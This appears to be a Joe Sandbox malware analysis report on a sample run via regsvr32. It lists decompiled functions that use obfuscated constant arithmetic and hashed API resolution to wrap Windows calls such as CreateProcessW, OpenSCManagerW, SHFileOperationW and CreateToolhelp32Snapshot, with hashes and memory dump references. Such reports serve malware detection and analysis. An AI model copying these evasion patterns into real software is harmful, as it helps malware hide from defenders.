                                                                                                                0x00268236
                                                                                                                0x0026823d

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 00268236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: 32c12780bd47bfd4084706e3a8e2cea4ee0a90bc2deb42aa388b411861652dd8
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: 1721F332801248BBCF159F95CD09CCEBFB9EB89714F108098FA1562121C3728A64EF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00263466 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00263466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t29;
				intOrPtr* _t35;
				void* _t36;
				void* _t41;

				_t41 = __ecx;
				E0026C98A(_t29);
				_v8 = 0x88f6ec;
				_v8 = _v8 | 0x6177bf25;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 + 0x167f;
				_v8 = _v8 ^ 0x0004f919;
				_v16 = 0x9ca171;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x0005b7ae;
				_v12 = 0xf5b080;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x54793a02;
				_t35 = E00267F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
				return _t36;
			}










                                                                                                                0x00263473
                                                                                                                0x00263486
                                                                                                                0x0026348b
                                                                                                                0x00263495
                                                                                                                0x002634a1
                                                                                                                0x002634a5
                                                                                                                0x002634ac
                                                                                                                0x002634b3
                                                                                                                0x002634ba
                                                                                                                0x002634be
                                                                                                                0x002634c5
                                                                                                                0x002634dc
                                                                                                                0x002634df
                                                                                                                0x002634ef
                                                                                                                0x002634fe
                                                                                                                0x00263505

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002634FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: 6b8a7f0307260809b4696684159b8ef26db7b0e9070ecf99584bb224e8955b15
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: 00113671805248BBCB11DFA6DD0ACAFBFB8EB85704F108098F914A2210D3714B24DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0027EAB3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0027EAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				intOrPtr* _t40;
				void* _t41;

				E0026C98A(_t35);
				_v28 = 0xe6c580;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0x2d161b;
				_v8 = _v8 + 0xffffdf88;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 | 0xc1e5ff2b;
				_v8 = _v8 ^ 0xc1e88dee;
				_v16 = 0xd78d92;
				_v16 = _v16 ^ 0xcf4c3c1d;
				_v16 = _v16 ^ 0xcf92c072;
				_v12 = 0x4f9c9d;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0xffff6ea2;
				_v12 = _v12 ^ 0x00061ead;
				_t40 = E00267F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
				return _t41;
			}












                                                                                                                0x0027eacf
                                                                                                                0x0027ead4
                                                                                                                0x0027eade
                                                                                                                0x0027eae6
                                                                                                                0x0027eae9
                                                                                                                0x0027eaf0
                                                                                                                0x0027eaf7
                                                                                                                0x0027eafb
                                                                                                                0x0027eb02
                                                                                                                0x0027eb09
                                                                                                                0x0027eb10
                                                                                                                0x0027eb17
                                                                                                                0x0027eb1e
                                                                                                                0x0027eb25
                                                                                                                0x0027eb29
                                                                                                                0x0027eb30
                                                                                                                0x0027eb49
                                                                                                                0x0027eb5a
                                                                                                                0x0027eb60

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 0027EB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: 5179a82dde4f02a5c68a304f3f63aa7566c30dde5077ac6b45a7aa6eaccd67a3
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 16111676C0221DFFCF10DFA4990A9EEBF74EB44314F108089E914A6294D3B14B649FA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00277DA0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00277DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t34;
				int _t44;
				signed int _t46;
				signed int _t47;
				struct _SHFILEOPSTRUCTW* _t54;

				_push(_a4);
				_t54 = __edx;
				_push(__edx);
				E0026C98A(_t34);
				_v12 = 0xcdb49a;
				_v12 = _v12 + 0x8f05;
				_v12 = _v12 + 0xffff9965;
				_v12 = _v12 ^ 0x00c100f7;
				_v16 = 0xfe6a9a;
				_v16 = _v16 + 0xffff1466;
				_v16 = _v16 ^ 0x00fd95e9;
				_v8 = 0xca762f;
				_v8 = _v8 << 0xe;
				_t46 = 0x7f;
				_v8 = _v8 / _t46;
				_t47 = 0x2e;
				_v8 = _v8 / _t47;
				_v8 = _v8 ^ 0x00082e4e;
				E00267F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
				_t44 = SHFileOperationW(_t54); // executed
				return _t44;
			}











                                                                                                                0x00277da7
                                                                                                                0x00277daa
                                                                                                                0x00277dac
                                                                                                                0x00277dae
                                                                                                                0x00277db3
                                                                                                                0x00277dbd
                                                                                                                0x00277dc6
                                                                                                                0x00277dcd
                                                                                                                0x00277dd4
                                                                                                                0x00277ddb
                                                                                                                0x00277de2
                                                                                                                0x00277de9
                                                                                                                0x00277df0
                                                                                                                0x00277df9
                                                                                                                0x00277dfe
                                                                                                                0x00277e06
                                                                                                                0x00277e0e
                                                                                                                0x00277e16
                                                                                                                0x00277e2d
                                                                                                                0x00277e36
                                                                                                                0x00277e3c

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00277E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: 4801818a47cfa4c80745a7deaa3cad21df97d4cc8ae894773bf373f53c389fec
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: 76118BB1D05208FFDB14DFA9D80A8DEBBB5EB45314F20C199E418A7241E7B55F549F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00263506 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00263506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t39;
				void* _t47;
				signed int _t49;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0026C98A(_t39);
				_v16 = 0xf4e2fc;
				_t49 = 0x3b;
				_v16 = _v16 / _t49;
				_v16 = _v16 ^ 0x00083f87;
				_v12 = 0x549d10;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0xffff8515;
				_v12 = _v12 | 0x9f85c2ad;
				_v12 = _v12 ^ 0x9fa0e66d;
				_v8 = 0xbeaf63;
				_v8 = _v8 | 0x7acbe5f7;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x3b62dfe8;
				_v8 = _v8 ^ 0xcc9b72fd;
				E00267F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
				return _t47;
			}









                                                                                                                0x0026350c
                                                                                                                0x0026350f
                                                                                                                0x00263512
                                                                                                                0x00263515
                                                                                                                0x00263518
                                                                                                                0x0026351d
                                                                                                                0x00263522
                                                                                                                0x00263533
                                                                                                                0x0026353b
                                                                                                                0x00263543
                                                                                                                0x0026354a
                                                                                                                0x00263551
                                                                                                                0x00263555
                                                                                                                0x0026355c
                                                                                                                0x00263563
                                                                                                                0x0026356a
                                                                                                                0x00263571
                                                                                                                0x00263578
                                                                                                                0x0026357c
                                                                                                                0x00263583
                                                                                                                0x0026359a
                                                                                                                0x002635ab
                                                                                                                0x002635b0

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 002635AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: bc40ab93772997e3082464e7b39fdd65b6978a552b0792923d601bffa07b42ae
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: 4E1125B1D01208BFCF04EFA4D84689EBFB5EB44704F208088F9146A221D3728B64EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002702D8 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E002702D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t45;
				int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				void* _t75;

				_push(_a8);
				_t75 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0026C98A(_t45);
				_v12 = 0xd4268f;
				_t61 = 0x55;
				_v12 = _v12 / _t61;
				_t62 = 0x39;
				_v12 = _v12 / _t62;
				_t63 = 0x19;
				_v12 = _v12 / _t63;
				_v12 = _v12 ^ 0x00038c24;
				_v16 = 0xae7fc4;
				_v16 = _v16 + 0x7c1;
				_v16 = _v16 ^ 0x00ac1f44;
				_v8 = 0x83f9bc;
				_v8 = _v8 ^ 0x1ab9b921;
				_v8 = _v8 | 0xa5451e1d;
				_t64 = 0x5c;
				_v8 = _v8 / _t64;
				_v8 = _v8 ^ 0x021ff71d;
				E00267F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
				_t59 = CloseHandle(_t75); // executed
				return _t59;
			}













                                                                                                                0x002702df
                                                                                                                0x002702e2
                                                                                                                0x002702e4
                                                                                                                0x002702e8
                                                                                                                0x002702e9
                                                                                                                0x002702ee
                                                                                                                0x002702ff
                                                                                                                0x00270304
                                                                                                                0x0027030c
                                                                                                                0x00270311
                                                                                                                0x00270319
                                                                                                                0x0027031e
                                                                                                                0x00270323
                                                                                                                0x0027032a
                                                                                                                0x00270331
                                                                                                                0x00270338
                                                                                                                0x0027033f
                                                                                                                0x00270346
                                                                                                                0x0027034d
                                                                                                                0x00270357
                                                                                                                0x0027035f
                                                                                                                0x00270367
                                                                                                                0x0027037b
                                                                                                                0x00270384
                                                                                                                0x0027038a

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00270384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: 1ec6cad0b6609c8a3c01229681f4c9080789df0e306844a62aef31b5bc29db21
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: 7D114F71E01208FFEB08DFA5D80A9EEBBB5EB84314F50C09AE504A7280E7B15F619F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Executed Functions

                                                                                                                Function 002627C2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E002627C2(void* __ecx, struct _WIN32_FIND_DATAW* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t31;
				void* _t38;
				struct _WIN32_FIND_DATAW* _t42;

				_push(_a12);
				_t42 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024C98A(_t31);
				_v12 = 0xe4f1ae;
				_v12 = _v12 << 8;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x00cdd546;
				_v8 = 0xc4dfbf;
				_v8 = _v8 + 0xffff3a7f;
				_v8 = _v8 | 0xfa0822f8;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0xcc3bab77;
				_v16 = 0x78a824;
				_v16 = _v16 + 0xffffcfc2;
				_v16 = _v16 ^ 0x007030e4;
				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x1e, __ecx, 0xa61827ac);
				_t38 = FindFirstFileW(_a4, _t42); // executed
				return _t38;
			}









                                                                                                                0x002627c9
                                                                                                                0x002627cc
                                                                                                                0x002627ce
                                                                                                                0x002627d1
                                                                                                                0x002627d4
                                                                                                                0x002627d5
                                                                                                                0x002627d6
                                                                                                                0x002627db
                                                                                                                0x002627e5
                                                                                                                0x002627ee
                                                                                                                0x002627ff
                                                                                                                0x00262802
                                                                                                                0x00262809
                                                                                                                0x00262810
                                                                                                                0x00262817
                                                                                                                0x0026281e
                                                                                                                0x00262822
                                                                                                                0x00262829
                                                                                                                0x00262830
                                                                                                                0x00262837
                                                                                                                0x00262847
                                                                                                                0x00262853
                                                                                                                0x00262859

                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(00CDD546,?,?,?,?,?,?,?,?,?,00000019), ref: 00262853
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileFindFirst
                                                                                                                • String ID: 0p
                                                                                                                • API String ID: 1974802433-1802687315
                                                                                                                • Opcode ID: fc2b56e9a5af49955b23cac201fd6edf975b456a943d445e867540712669b5ae
                                                                                                                • Instruction ID: 73cc87abafc66d262bdce3cb05264045830dd454cc55176bdcec6c2192430fc1
                                                                                                                • Opcode Fuzzy Hash: fc2b56e9a5af49955b23cac201fd6edf975b456a943d445e867540712669b5ae
                                                                                                                • Instruction Fuzzy Hash: 9F1115B1C0120CBBDF14EFA5D94988EBFB4EB40314F208198E81566251D3719B64DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0024BE5E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0024BE5E(int __edx) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t36;
				signed int _t37;
				int _t42;

				_v12 = 0x4d2169;
				_v12 = _v12 + 0xffff4d82;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x04c328ab;
				_v16 = 0xf87f59;
				_t37 = 0x22;
				_t42 = __edx;
				_v16 = _v16 / _t37;
				_v16 = _v16 ^ 0x0002495a;
				_v8 = 0x5a0fa5;
				_v8 = _v8 * 0x42;
				_v8 = _v8 >> 6;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x00011980;
				E00247F78(_t37, 0xbd3f148a, _t37, 0xc4, _t37, 0x9af936f0);
				_t36 = CreateToolhelp32Snapshot(_t42, 0); // executed
				return _t36;
			}









                                                                                                                0x0024be64
                                                                                                                0x0024be6b
                                                                                                                0x0024be72
                                                                                                                0x0024be76
                                                                                                                0x0024be7d
                                                                                                                0x0024be8a
                                                                                                                0x0024be8b
                                                                                                                0x0024be96
                                                                                                                0x0024be9e
                                                                                                                0x0024bea5
                                                                                                                0x0024beb7
                                                                                                                0x0024beba
                                                                                                                0x0024bebe
                                                                                                                0x0024bec2
                                                                                                                0x0024bed2
                                                                                                                0x0024bedd
                                                                                                                0x0024bee3

                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00CD5045,00000000,?,?,?,000073AC), ref: 0024BEDD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateSnapshotToolhelp32
                                                                                                                • String ID: i!M
                                                                                                                • API String ID: 3332741929-1018495347
                                                                                                                • Opcode ID: fc23c2cb32c452360c21f51f575530c3eb76c2a302990b8ead27f63d033a9342
                                                                                                                • Instruction ID: cef1306cc511ecf1d6416f1d646e6385b5452e1ae07d113004fd98cf305c8602
                                                                                                                • Opcode Fuzzy Hash: fc23c2cb32c452360c21f51f575530c3eb76c2a302990b8ead27f63d033a9342
                                                                                                                • Instruction Fuzzy Hash: A5010871D0520CFBDB18DFA9D94AA8EBBB4EB90304F20C199E914A7280D7B45B588B85
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00246E01 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 718 246e01-246eb3 call 24c98a call 247f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00246E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t36;
				void* _t46;
				signed int _t48;
				signed int _t49;

				_push(0);
				_push(_a12);
				_push(_a8);
				_push(0);
				E0024C98A(_t36);
				_v32 = 0x5e4691;
				_v28 = 0xb22c2d;
				_v24 = 0xd08f35;
				_v20 = 0;
				_v16 = 0x466167;
				_t48 = 0x37;
				_v16 = _v16 / _t48;
				_v16 = _v16 ^ 0x000b48c4;
				_v8 = 0x78b9b;
				_t49 = 0x12;
				_v8 = _v8 / _t49;
				_v8 = _v8 + 0x94cf;
				_v8 = _v8 ^ 0x0006a86d;
				_v12 = 0x7d284b;
				_v12 = _v12 + 0xfffff9ba;
				_v12 = _v12 ^ 0x007a5aaa;
				E00247F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
				_t46 = OpenSCManagerW(0, 0, _a12); // executed
				return _t46;
			}














                                                                                                                0x00246e0a
                                                                                                                0x00246e0b
                                                                                                                0x00246e0e
                                                                                                                0x00246e11
                                                                                                                0x00246e14
                                                                                                                0x00246e1c
                                                                                                                0x00246e23
                                                                                                                0x00246e2c
                                                                                                                0x00246e33
                                                                                                                0x00246e36
                                                                                                                0x00246e42
                                                                                                                0x00246e47
                                                                                                                0x00246e4c
                                                                                                                0x00246e53
                                                                                                                0x00246e5d
                                                                                                                0x00246e65
                                                                                                                0x00246e6d
                                                                                                                0x00246e74
                                                                                                                0x00246e7b
                                                                                                                0x00246e82
                                                                                                                0x00246e89
                                                                                                                0x00246ea0
                                                                                                                0x00246ead
                                                                                                                0x00246eb3

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00246EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 6ef6a4cb5bbfdb27ad125f8102e1ce17c50244576f0bfce07033f3d63a434212
                                                                                                                • Instruction ID: 161634b4ddbe713b960a7f07fea86dadfddbed23c5276b415456f4b05c0be62c
                                                                                                                • Opcode Fuzzy Hash: 6ef6a4cb5bbfdb27ad125f8102e1ce17c50244576f0bfce07033f3d63a434212
                                                                                                                • Instruction Fuzzy Hash: 7E1155B2D01218BBDB04DFA9C8498DEBFB6EF45314F10C189FA18A7241D7B55B259FA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0024BEE4 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E0024BEE4(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t36;
				int _t43;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024C98A(_t36);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x114bf3;
				_v8 = 0x232d23;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xc4ee;
				_v8 = _v8 * 0x1e;
				_v8 = _v8 ^ 0x001ad829;
				_v12 = 0x454227;
				_v12 = _v12 ^ 0xb663ae8e;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x16c7b083;
				_v16 = 0x24a5bd;
				_v16 = _v16 + 0xffffd8d0;
				_v16 = _v16 ^ 0x00233a4c;
				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x25d, __ecx, 0x980b4427);
				_t43 = lstrcmpiW(_a4, _a12); // executed
				return _t43;
			}











                                                                                                                0x0024beea
                                                                                                                0x0024beed
                                                                                                                0x0024bef0
                                                                                                                0x0024bef3
                                                                                                                0x0024bef7
                                                                                                                0x0024bef8
                                                                                                                0x0024befd
                                                                                                                0x0024bf04
                                                                                                                0x0024bf0d
                                                                                                                0x0024bf14
                                                                                                                0x0024bf1b
                                                                                                                0x0024bf1f
                                                                                                                0x0024bf36
                                                                                                                0x0024bf39
                                                                                                                0x0024bf40
                                                                                                                0x0024bf47
                                                                                                                0x0024bf4e
                                                                                                                0x0024bf52
                                                                                                                0x0024bf59
                                                                                                                0x0024bf60
                                                                                                                0x0024bf67
                                                                                                                0x0024bf77
                                                                                                                0x0024bf85
                                                                                                                0x0024bf8a

                                                                                                                APIs
                                                                                                                • lstrcmpiW.KERNEL32(16C7B083,00000000), ref: 0024BF85
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
